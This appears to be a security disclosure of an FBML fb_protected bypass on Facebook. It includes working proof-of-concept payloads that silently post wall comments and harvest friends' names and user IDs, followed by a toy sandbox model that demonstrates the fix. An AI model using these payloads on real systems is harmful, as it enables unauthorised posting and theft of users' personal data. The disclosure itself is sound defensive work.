In a Facebook FBML application some elements are protected with fb_protected="true". The protection does not extend to the descendants of the protected element: when the DOM is traversed with getElementsByTagName from an ancestor, the sub-elements of the protected element can still be located, read and manipulated.

A malicious application would place a comment box (fb:comments) inside a Facebook application, or inside an iframe pointing at http://www.facebook.com/plugins/serverfbml.php with the FBML passed in the URL. The page's script would then call getElementsByTagName to locate the comment textarea and fill it in with setValue. The same technique sets the "Post on wall" checkbox with setChecked. Finally, a getElementsByTagName call finds the only form instance and calls its submit function, posting the new comment. The whole sequence is fully automated and invisible to the user; no click is required.

Personal Information (all friends and groups) Leakage

An FBML multi-friend selector (fb:multi-friend-selector) is rendered on the page. Applying the same technique as above, the malicious application locates all links inside the selector's elements. Each link carries a title attribute with the friend's full name (read with ele.getTitle()). The neighbouring div has a background style that can also be read (getStyle('backgroundImage')) to obtain the friend's profile picture URL and, with it, the user ID.

  • How do you reproduce the issues?

Comment box with wall post:

iFramed URL via serverfbml.php: http://www.facebook.com/plugins/serverfbml.php?api_key=8725050364&fbml=%3Cdiv%20id%3D%22c%22%3E%3Cfb%3Acomments%20xid%3D%22xxx%22%20canpost%3D%22true%22%20candelete%3D%22false%22%3E%3C%2Ffb%3Acomments%3E%3C%2Fdiv%3E%0A%3Cscript%3E%0Ac%20%3D%20document.getElementById('c')%3B%0Ac.getElementsByTagName('input')%5B12%5D.setChecked(true)%3B%0Ac.getElementsByTagName('textarea')%5B0%5D.setValue('woot%20Content')%3B%0Ac.getElementsByTagName('form')%5B0%5D.submit()%3B%0A%3C%2Fscript%3E

Decoded fbml parameter:

    <div id="c"><fb:comments xid="xxx" canpost="true" candelete="false"></fb:comments></div>
    <script>
    c = document.getElementById('c');
    c.getElementsByTagName('input')[12].setChecked(true);
    c.getElementsByTagName('textarea')[0].setValue('woot Content');
    c.getElementsByTagName('form')[0].submit();
    </script>

Personal Information (all friends and groups) Leakage

iFramed URL via serverfbml.php:

http://www.facebook.com/plugins/serverfbml.php?api_key=8725050364&fbml=%3Ctextarea%20id%3D%22out%22%20cols%3D%2250%22%20rows%3D%2210%22%3E%3C%2Ftextarea%3E%0A%3Cdiv%20id%3D%22test%22%3E%0A%3Cfb%3Arequest-form%20type%3D%22t%22%20content%3D%22c%22%20%3E%20%0A%3Cfb%3Amulti-friend-selector%20actiontext%3D%22x%22%20%2F%3E%20%0A%3C%2Ffb%3Arequest-form%3E%0A%3C%2Fdiv%3E%0A%0A%3Cscript%3E%0A%09o%20%3D%20document.getElementById(%27out%27)%3B%0A%09setTimeout(%0A%09function()%7B%0A%09%09ele%20%3D%20document.getElementById(%27test%27)%3B%0A%09%09ele%20%3D%20ele.getElementsByTagName(%27a%27)%3B%0A%09%09for(i%3D0%3B%20i%3Cele.length%3B%20i%2B%2B)%7B%0A%09%09%09name%20%3D%20ele%5Bi%5D.getTitle()%3B%0A%09%09%09%2F%2F.getStyle(%27backgroundImage%27)%09%0A%09%09%09if%20(name)%20o.setValue(o.getValue()%2Bname%2B%22%5Cn%22)%3B%0A%09%09%7D%0A%09%7D%2C%202000)%3B%0A%3C%2Fscript%3E%0A

Decoded fbml parameter:

    <textarea id="out" cols="50" rows="10"></textarea>
    <div id="test">
    <fb:request-form type="t" content="c" >
    <fb:multi-friend-selector actiontext="x" />
    </fb:request-form>
    </div>

    <script>
    	o = document.getElementById('out');
    	setTimeout(
    	function(){
    		ele = document.getElementById('test');
    		ele = ele.getElementsByTagName('a');
    		for(i=0; i<ele.length; i++){
    			name = ele[i].getTitle();
    			//.getStyle('backgroundImage')
    			if (name) o.setValue(o.getValue()+name+"\n");
    		}
    	}, 2000);
    </script>

In this example the harvested data is simply written into a text area on the page. In a real attack it would be sent to the attacker's server, or used to craft convincing, misleading messages to the victim's friends.
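The root cause behind both findings (the comment-box auto-post and the friend-list leak) is the same: the protection flag is checked on the element itself, not along the ancestor chain, so a traversal that starts outside the protected subtree still reaches everything inside it. The following is an added example, not code from the original report and not Facebook's FBJS implementation. It models a tiny FBJS-style sandbox over a toy DOM with both the broken lookup (flag checked only on the returned node) and a hardened one (a protected subtree is opaque to traversal), then replays the two attacks against each. The node layout, the fb_protected placement on the rendered fb:comments and fb:multi-friend-selector containers, the profile-picture URL format and the friend names are all constructed assumptions; getTitle, getStyle, setValue, setChecked and submit mirror the method names used in the report.

```javascript
// Added example: toy model of an FBJS-style DOM sandbox with a vulnerable and a
// hardened getElementsByTagName. Everything here is constructed for illustration.
const VULNERABLE = 'vulnerable';
const HARDENED = 'hardened';

// Minimal raw DOM node: tag, attributes, inline style, children, form state.
function node(tag, attrs = {}, children = [], style = {}) {
  return { tag, attrs, style, children, value: '', checked: false, submitted: null };
}

// Depth-first search on raw nodes (platform-side helper, not exposed to apps).
function rawFind(n, tag) {
  for (const c of n.children) {
    if (c.tag === tag) return c;
    const hit = rawFind(c, tag);
    if (hit) return hit;
  }
  return null;
}

// Wrapper handed to application code; it never exposes the raw node directly.
class Elem {
  constructor(raw, mode) { this._raw = raw; this._mode = mode; }
  getTitle() { return this._raw.attrs.title || null; }
  getStyle(prop) { return this._raw.style[prop] || null; }
  setValue(v) { this._raw.value = v; }
  getValue() { return this._raw.value; }
  setChecked(b) { this._raw.checked = !!b; }
  submit() {
    // Platform-side: record what a real submission of this form would carry.
    this._raw.submitted = {
      text: rawFind(this._raw, 'textarea').value,
      postToWall: rawFind(this._raw, 'input').checked,
    };
  }
  getElementsByTagName(tag) {
    const out = [];
    const walk = (n) => {
      for (const c of n.children) {
        const prot = c.attrs.fb_protected === 'true';
        if (c.tag === tag && !prot) out.push(new Elem(c, this._mode));
        // The bug: the vulnerable walker still descends into a protected node,
        // and its descendants carry no flag of their own, so they are returned.
        // The hardened walker treats the protected subtree as opaque.
        if (!prot || this._mode === VULNERABLE) walk(c);
      }
    };
    walk(this._raw);
    return out;
  }
}

// Assumed rendering of <div id="c"><fb:comments ...></fb:comments></div>.
function buildCommentBox() {
  const form = node('form', {}, [
    node('textarea', { name: 'text' }),
    node('input', { type: 'checkbox', name: 'post_to_wall' }),
  ]);
  return node('div', { id: 'c' }, [node('fb:comments', { fb_protected: 'true' }, [form])]);
}

// Constructed sample friends and an assumed profile-picture URL scheme.
const SAMPLE_FRIENDS = [
  { name: 'Alice Example', uid: '1001' },
  { name: 'Bob Example', uid: '1002' },
];

// Assumed rendering of <fb:multi-friend-selector/>: one <a title="Full Name">
// per friend followed by a sibling <div> whose background image is the picture.
function buildFriendSelector(friends) {
  const rows = [];
  for (const f of friends) {
    rows.push(node('a', { title: f.name, href: '#' }));
    rows.push(node('div', {}, [], { backgroundImage: `url(http://profile.example/${f.uid}.jpg)` }));
  }
  return node('div', { id: 'test' }, [node('fb:multi-friend-selector', { fb_protected: 'true' }, rows)]);
}

// Attack 1 (the report's first payload): fill the comment, tick "Post on wall",
// submit. Returns what was submitted, or null if the sandbox blocked the lookup.
function autoPostComment(mode, text) {
  const page = buildCommentBox();
  const c = new Elem(page, mode);
  const areas = c.getElementsByTagName('textarea');
  const boxes = c.getElementsByTagName('input');
  const forms = c.getElementsByTagName('form');
  if (!areas.length || !boxes.length || !forms.length) return null;
  boxes[0].setChecked(true);
  areas[0].setValue(text);
  forms[0].submit();
  return rawFind(page, 'form').submitted;
}

// Attack 2 (the report's second payload): read every link title and the
// neighbouring div's background image, and pull the user ID out of the URL.
function harvestFriends(mode) {
  const test = new Elem(buildFriendSelector(SAMPLE_FRIENDS), mode);
  const links = test.getElementsByTagName('a');
  const pics = test.getElementsByTagName('div');
  const out = [];
  links.forEach((a, i) => {
    const name = a.getTitle();
    const bg = pics[i] ? pics[i].getStyle('backgroundImage') : null;
    const m = bg && /\/(\d+)\.jpg\)$/.exec(bg);
    if (name) out.push({ name, uid: m ? m[1] : null, picture: bg });
  });
  return out;
}

console.log(autoPostComment(VULNERABLE, 'woot Content'), autoPostComment(HARDENED, 'woot Content'));
console.log(harvestFriends(VULNERABLE), harvestFriends(HARDENED));
```

Against the vulnerable walker both attacks succeed without any user interaction; against the hardened walker the lookups return nothing, so the script has no textarea, form or link to act on. The point for anyone designing a DOM sandbox is that a "protected" marker must be enforced as an ancestor property during traversal, not as a per-node check on whatever a traversal happens to return.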